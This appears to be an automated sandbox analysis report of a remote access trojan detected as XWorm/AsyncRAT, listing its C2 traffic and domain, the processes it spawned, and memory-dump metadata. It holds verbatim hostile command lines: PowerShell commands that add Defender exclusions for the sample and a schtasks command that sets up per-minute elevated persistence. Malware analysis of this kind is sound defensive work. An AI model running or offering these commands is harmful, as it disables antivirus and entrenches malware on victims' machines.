Dec 20, 2024 19:00:58.804254055 CET | 38116 | 49801 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:06.221714973 CET | 38116 | 49801 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:06.221807957 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:07.736589909 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:07.737701893 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:07.856151104 CET | 38116 | 49801 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:07.857295990 CET | 38116 | 49858 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:07.857377052 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:07.883177996 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:08.002996922 CET | 38116 | 49858 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:22.002928972 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:22.122509003 CET | 38116 | 49858 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:29.754467010 CET | 38116 | 49858 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:29.754683018 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:29.814717054 CET | 49858 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:29.816040993 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:29.934907913 CET | 38116 | 49858 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:29.935991049 CET | 38116 | 49910 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:29.936086893 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:29.959099054 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:30.078777075 CET | 38116 | 49910 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:41.924243927 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:42.043803930 CET | 38116 | 49910 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:51.830261946 CET | 38116 | 49910 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:51.830336094 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:51.830404997 CET | 49910 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:51.833564043 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:51.950041056 CET | 38116 | 49910 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:51.953196049 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:51.953277111 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:51.983850956 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:52.103652000 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:52.103739023 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:52.223385096 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:56.705471992 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:56.825927973 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:01:57.158559084 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:01:57.278194904 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:02.343096018 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:02.462702990 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:02.790981054 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:02.910613060 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:02.910820961 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:03.030404091 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:03.153239965 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:03.277010918 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:03.277167082 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:03.398976088 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:02:07.647160053 CET | 49961 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:02:07.766860962 CET | 38116 | 49961 | 147.185.221.24 | 192.168.2.6

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 19:00:43.914254904 CET | 59542 | 53 | 192.168.2.6 | 1.1.1.1
Dec 20, 2024 19:00:44.189271927 CET | 53 | 59542 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 19:00:43.914254904 CET | 192.168.2.6 | 1.1.1.1 | 0xb124 | Standard query (0) | below-communist.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 19:00:44.189271927 CET | 1.1.1.1 | 192.168.2.6 | 0xb124 | No error (0) | below-communist.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false
                                                                    Target ID:0
                                                                    Start time:12:59:57
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\PjGz899RZV.exe"
                                                                    Imagebase:0xe0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:13:00:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:13:00:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:13:00:09
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:13:00:09
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:13:00:19
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:13:00:19
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:13:00:37
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0x7ff650070000
                                                                    File size:235'008 bytes
                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:13:00:37
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:13:00:50
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0xe90000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 82%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:13:00:58
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0x7c0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:13:01:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Imagebase:0x9e0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:13:02:00
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Imagebase:0x6b0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:29.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:6
                                                                      Total number of Limit Nodes:0
execution_graph
Nodes:
4728: 7ffd34562e51
4730: 7ffd34562e57 SetWindowsHookExW
4731: 7ffd34563021
4724: 7ffd345629fd
4725: 7ffd34562a2f RtlSetProcessIsCritical
4727: 7ffd34562ae2
Edges:
4728 -> 4730 -> 4731
4724 -> 4725 -> 4727

                                                                      Control-flow Graph

(control-flow graph omitted; listed basic blocks range from 7ffd34560e89 to 7ffd34561956; legend: Executed / Not Executed)
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SAM_^
                                                                      • API String ID: 0-3658645246
                                                                      • Opcode ID: 4b1d006975b896b1264d1cb1a22689aeb63ac751bbd16c47a7faf60afc1785df
                                                                      • Instruction ID: aa73e0935d31567d7df37afcbcbfd95da461eaa13e13f73f444aff0caabf0409
                                                                      • Opcode Fuzzy Hash: 4b1d006975b896b1264d1cb1a22689aeb63ac751bbd16c47a7faf60afc1785df
                                                                      • Instruction Fuzzy Hash: 1E520871B1CA094FEB69FB6884697B977D6EF9A320F440179E44EC32D2DE2DAC418341

                                                                      Control-flow Graph

(control-flow graph omitted; listed basic blocks range from 7ffd34560808 to 7ffd34561956; legend: Executed / Not Executed)
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SAM_^
                                                                      • API String ID: 0-3658645246
                                                                      • Opcode ID: 157871a218a551e3f179c196cb3c822ada692e7dc732850c4b93af4d39d79313
                                                                      • Instruction ID: cd7553e12d33d459a95f447b738d3ff3091d7bafe3b50c4c5530dab8f71f7a0d
                                                                      • Opcode Fuzzy Hash: 157871a218a551e3f179c196cb3c822ada692e7dc732850c4b93af4d39d79313
                                                                      • Instruction Fuzzy Hash: 7242E261F1CA4A4FEBA9EB6C84A537973D2EF9A310F540579E44ED32D2CE2DAC418341

                                                                      Control-flow Graph

(control-flow graph omitted; listed basic blocks range from 7ffd34568df6 to 7ffd345692b2; legend: Executed / Not Executed)
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7fedfa83db8d4b075f2485dd57d7f98f97cfba1a47fc75285efe453ff95cc2a
                                                                      • Instruction ID: 60627fd038b12e5c7f53d638814f4eca8ce37b4981b9cd519e652d0e5cc04523
                                                                      • Opcode Fuzzy Hash: f7fedfa83db8d4b075f2485dd57d7f98f97cfba1a47fc75285efe453ff95cc2a
                                                                      • Instruction Fuzzy Hash: 9CF1A430A0CA8D8FEBA9DF28C8557E977E1FF55310F04426EE84DC7291DB7899458B82

                                                                      Control-flow Graph

(control-flow graph omitted; listed basic blocks range from 7ffd34569ba2 to 7ffd3456a02e; legend: Executed / Not Executed)
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:

                                                                      Control-flow Graph
                                                                      Control-flow graph beginning at basic block 7ffd34562e51 (rendered graph image with executed / not-executed node colouring; not recoverable as text); the graph contains a call to SetWindowsHookExW
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0

                                                                      Control-flow Graph
                                                                      Control-flow graph beginning at basic block 7ffd345629fd (rendered graph image with executed / not-executed node colouring; not recoverable as text); the graph contains a call to RtlSetProcessIsCritical
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L_^
                                                                      • API String ID: 0-3811526842
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239156340.00007FFD3443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3443D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd3443d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction ID: d5890193d180fc2d010273fca3adca2fe335e6924b43b9623caa6d023ab94d49
                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction Fuzzy Hash: 8101447121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665DA26E882CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc9e95e6afd5411fd832e312273e8543ef5e1d6a49bf30d2dab3ea73cdce5845
                                                                      • Instruction ID: 14c3cadb040e97b46e7127c5bc87646e0b7229242e9c1494978a4c0434e2a1c4
                                                                      • Opcode Fuzzy Hash: cc9e95e6afd5411fd832e312273e8543ef5e1d6a49bf30d2dab3ea73cdce5845
                                                                      • Instruction Fuzzy Hash: 48E04F35908A4C8F9F55EF18D85A4E97BE0FF6A311B10029BE90DC7120DB75D958CBC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                                                      • API String ID: 0-622050427
                                                                      • Opcode ID: bf57c2cae731ddb52a5131212f692e2bcd333364dcb22a9b0f5c87edce2c85bf
                                                                      • Instruction ID: 254e86c7b0adc0acb85ff32252b4d2b0edb7b79cc79ab8f08f9fc1dfbd20a36c
                                                                      • Opcode Fuzzy Hash: bf57c2cae731ddb52a5131212f692e2bcd333364dcb22a9b0f5c87edce2c85bf
                                                                      • Instruction Fuzzy Hash: 6B2104B7708465AFD3167BBDB8149EA3744CFA433478503B2E199DB0A3F918A4868AC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
